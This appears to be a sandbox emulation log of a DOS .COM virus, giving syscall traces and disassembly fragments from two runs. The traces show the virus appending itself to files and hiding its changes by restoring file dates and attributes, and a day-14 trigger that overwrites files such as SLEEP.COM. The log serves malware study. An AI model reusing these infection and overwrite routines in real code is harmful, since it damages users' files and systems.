2018-12-25T12:31:23.287702346Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.295600454Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.298339371Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.304974258Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.312202998Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.322676298Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.326066679Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.337733486Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.34378923Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.353829983Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.357040349Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.36311583Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.369509211Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.377386536Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.380115332Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:23.386420279Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:23.393736035Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:23.401237951Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:23.404424089Z 26 PC: 12c5f | Set disk transfer address
2018-12-25T12:31:23.406537141Z 37 PC: 12c68 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.408194349Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11770,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.054767483Z 44 PC: 12bcc | Get time 0x12bcc: or dx, dx
0x12bce: je 0x12bc8
0x12bd0: mov word ptr [bp + 0x13f], dx
0x12bd4: mov ax, 0xfe05
0x12bd7: jmp 0x12bd5
0x12bd9: add ax, 0x4b21
0x12bdc: int 0x21
0x12bde: mov word ptr [bp + 0x44f], bx
0x12be2: mov word ptr [bp + 0x451], es
0x12be6: mov ah, 0x25
0x12be8: lea dx, word ptr [bp + 0x3cc]
0x12bec: int 0x21
0x12bee: lea si, word ptr [bp + 0x3e3]
0x12bf2: xor dx, dx
0x12bf4: mov ah, 0x47
0x12bf6: int 0x21
0x12bf8: mov ah, 0x1a
0x12bfa: lea dx, word ptr [bp + 0x423]
0x12bfe: int 0x21
0x12c00: mov byte ptr [bp + 0x44e], 0
2018-12-25T12:31:23.05779081Z 53 PC: 12bde | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.059505588Z 37 PC: 12bee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.061138159Z 71 PC: 12bf8 | Get current directory
2018-12-25T12:31:23.065172397Z 26 PC: 12c00 | Set disk transfer address
2018-12-25T12:31:23.06689179Z 78 PC: 12c7a | Find first file
2018-12-25T12:31:23.074677779Z 67 PC: 12c87 | Get or set file attributes
2018-12-25T12:31:23.091298619Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-25T12:31:23.099768399Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.107407597Z 66 PC: 12d3e | Move file pointer
2018-12-25T12:31:23.1096965Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-25T12:31:23.121590403Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.123151199Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.130702387Z 87 PC: 12cf6 | Get or set file date and time
2018-12-25T12:31:23.133432825Z 67 PC: 12d0d | Get or set file attributes
2018-12-25T12:31:23.146361379Z 62 PC: 12cb4 | Close file
2018-12-25T12:31:23.154778756Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.158419716Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.179694064Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.187264689Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.196105629Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.198281239Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.2084006Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.210329196Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.218302442Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.220597918Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.232915143Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.238966992Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.241936708Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.2535019Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.261851311Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.276570722Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.278452644Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.285360344Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.286728912Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.291443897Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.293472423Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.301142727Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.309533667Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.313843395Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.326505287Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.337619288Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.349125985Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.351377957Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.361016105Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.362751286Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.371482183Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.374226784Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.386723174Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.395622332Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.39986699Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.411318972Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.419446904Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.426903765Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.429147763Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.441384069Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.445146317Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.452751034Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.45568471Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.468887834Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.476972582Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.479961383Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.49219432Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.500054967Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.507735917Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.511238605Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.521632543Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.52359083Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.53245707Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.534143556Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.549370349Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.558414885Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.561594416Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.572635409Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.580479585Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.626106328Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.628563626Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.747937561Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.751409643Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.759018156Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.761243409Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.861725533Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:24.16199433Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:24.165428494Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:24.348096836Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:24.355846269Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:24.358746526Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:24.360648937Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:24.531777725Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:24.538604733Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:24.549019774Z 59 PC: 12c17 | Change current directory
2018-12-25T12:31:24.552505672Z 59 PC: 12c23 | Change current directory
2018-12-25T12:31:24.55525883Z 42 PC: 12c27 | Get date 0x12c27: cmp dl, 0xe
0x12c2a: jne 0x12c58
0x12c2c: mov ah, 0x4e
0x12c2e: lea dx, word ptr [bp + 0x3d5]
0x12c32: xor cx, cx
0x12c34: int 0x21
0x12c36: jb 0x12c58
0x12c38: mov ax, 0x3d01
0x12c3b: lea dx, word ptr [bp + 0x441]
0x12c3f: int 0x21
0x12c41: jb 0x12c54
0x12c43: mov bx, ax
0x12c45: mov ah, 0x40
0x12c47: mov cx, 0x19d
0x12c4a: lea dx, word ptr [bp + 0x15f]
0x12c4e: int 0x21
0x12c50: mov ah, 0x3e
0x12c52: int 0x21
0x12c54: mov ah, 0x4f
0x12c56: jmp 0x12c2e
2018-12-25T12:31:24.55706188Z 26 PC: 12c5f | Set disk transfer address
2018-12-25T12:31:24.558857113Z 37 PC: 12c68 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:24.563248024Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')

{"DateBased":true,"Day":14,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11770,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.070727921Z 44 PC: 12bcc | Get time 0x12bcc: or dx, dx
0x12bce: je 0x12bc8
0x12bd0: mov word ptr [bp + 0x13f], dx
0x12bd4: mov ax, 0xfe05
0x12bd7: jmp 0x12bd5
0x12bd9: add ax, 0x4b21
0x12bdc: int 0x21
0x12bde: mov word ptr [bp + 0x44f], bx
0x12be2: mov word ptr [bp + 0x451], es
0x12be6: mov ah, 0x25
0x12be8: lea dx, word ptr [bp + 0x3cc]
0x12bec: int 0x21
0x12bee: lea si, word ptr [bp + 0x3e3]
0x12bf2: xor dx, dx
0x12bf4: mov ah, 0x47
0x12bf6: int 0x21
0x12bf8: mov ah, 0x1a
0x12bfa: lea dx, word ptr [bp + 0x423]
0x12bfe: int 0x21
0x12c00: mov byte ptr [bp + 0x44e], 0
2018-12-25T12:31:23.073677617Z 53 PC: 12bde | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.075728016Z 37 PC: 12bee | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:23.077770713Z 71 PC: 12bf8 | Get current directory
2018-12-25T12:31:23.081450932Z 26 PC: 12c00 | Set disk transfer address
2018-12-25T12:31:23.083129321Z 78 PC: 12c7a | Find first file
2018-12-25T12:31:23.089727759Z 67 PC: 12c87 | Get or set file attributes
2018-12-25T12:31:23.108025983Z 61 PC: 12c8e | Open file (Filename = '��&�')
2018-12-25T12:31:23.115367982Z 63 PC: 12c9b | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.122351602Z 66 PC: 12d3e | Move file pointer
2018-12-25T12:31:23.125057191Z 64 PC: 12ace | Write file or device (Write 690 bytes on handle 5)
2018-12-25T12:31:23.134469591Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.135876863Z 64 PC: 12ce9 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.144024676Z 87 PC: 12cf6 | Get or set file date and time
2018-12-25T12:31:23.145710476Z 67 PC: 12d0d | Get or set file attributes
2018-12-25T12:31:23.157599766Z 62 PC: 12cb4 | Close file
2018-12-25T12:31:23.165697727Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.168695603Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.179385133Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.186972825Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.194513976Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.196400008Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.207949561Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.209813666Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.217360399Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.219117057Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.231079243Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.239086263Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.242070217Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.253385427Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.260699585Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.267661768Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.271316987Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.280136869Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.281683196Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.290514284Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.292501771Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.304706477Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.313318312Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.316573739Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.327493339Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.336514922Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.344259178Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.34613228Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.35554935Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.357867669Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.365399654Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.367224843Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.380015172Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.388480408Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.391754809Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.404320392Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.413102715Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.420740135Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.42382041Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.433733719Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.435718707Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.441862081Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.444997103Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.457106966Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.465731915Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.470071703Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.481803776Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.489543372Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.497979851Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.500395975Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.510640688Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.513465062Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.521335278Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.523478702Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.536576541Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:23.545417171Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:23.548700734Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:23.559811516Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:23.568211756Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:23.575679559Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.577869128Z 64 PC: 12ace | Write file or device (See above)
2018-12-25T12:31:23.689775224Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:23.691766057Z 64 PC: 12ce9 | Write file or device (See above)
2018-12-25T12:31:23.699539834Z 87 PC: 12cf6 | Get or set file date and time (See above)
2018-12-25T12:31:23.702466197Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:23.854728588Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:24.012822697Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:24.016756158Z 67 PC: 12c87 | Get or set file attributes (See above)
2018-12-25T12:31:24.531775042Z 61 PC: 12c8e | Open file (See above)
2018-12-25T12:31:24.536576483Z 63 PC: 12c9b | Read file or device (See above)
2018-12-25T12:31:24.539453179Z 66 PC: 12d3e | Move file pointer (See above)
2018-12-25T12:31:24.541254874Z 67 PC: 12d0d | Get or set file attributes (See above)
2018-12-25T12:31:24.577315459Z 62 PC: 12cb4 | Close file (See above)
2018-12-25T12:31:24.580023833Z 79 PC: 12c7a | Find next file (See above)
2018-12-25T12:31:24.584459922Z 59 PC: 12c17 | Change current directory
2018-12-25T12:31:24.595326735Z 59 PC: 12c23 | Change current directory
2018-12-25T12:31:24.606374693Z 42 PC: 12c27 | Get date 0x12c27: cmp dl, 0xe
0x12c2a: jne 0x12c58
0x12c2c: mov ah, 0x4e
0x12c2e: lea dx, word ptr [bp + 0x3d5]
0x12c32: xor cx, cx
0x12c34: int 0x21
0x12c36: jb 0x12c58
0x12c38: mov ax, 0x3d01
0x12c3b: lea dx, word ptr [bp + 0x441]
0x12c3f: int 0x21
0x12c41: jb 0x12c54
0x12c43: mov bx, ax
0x12c45: mov ah, 0x40
0x12c47: mov cx, 0x19d
0x12c4a: lea dx, word ptr [bp + 0x15f]
0x12c4e: int 0x21
0x12c50: mov ah, 0x3e
0x12c52: int 0x21
0x12c54: mov ah, 0x4f
0x12c56: jmp 0x12c2e
2018-12-25T12:31:24.609778574Z 78 PC: 12c36 | Find first file
2018-12-25T12:31:24.619859514Z 61 PC: 12c41 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:24.626994441Z 64 PC: 12c50 | Write file or device (Write 413 bytes on handle 5)
2018-12-25T12:31:24.635200434Z 62 PC: 12c54 | Close file
2018-12-25T12:31:24.643883624Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.647380328Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.656440802Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.664110013Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.673023984Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.676037054Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.68343888Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.69368526Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.702095393Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.706032948Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.713306112Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.720843096Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.730882724Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.734286167Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.741946032Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.750679872Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.756516032Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.758517784Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.76340563Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.768536405Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.773780704Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.781455664Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.801960379Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.809867776Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.815990036Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.818178314Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.822981233Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.828046016Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.833932344Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.835827583Z 61 PC: 12c41 | Open file (See above)
2018-12-25T12:31:24.840643809Z 64 PC: 12c50 | Write file or device (See above)
2018-12-25T12:31:24.848343297Z 62 PC: 12c54 | Close file (See above)
2018-12-25T12:31:24.858085122Z 79 PC: 12c36 | Find next file (See above)
2018-12-25T12:31:24.861410344Z 26 PC: 12c5f | Set disk transfer address
2018-12-25T12:31:24.864271642Z 37 PC: 12c68 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:31:24.865733843Z 9 PC: 12aa2 | Display string (String= 'Hello - This is a 100 COM test file, 1993 ')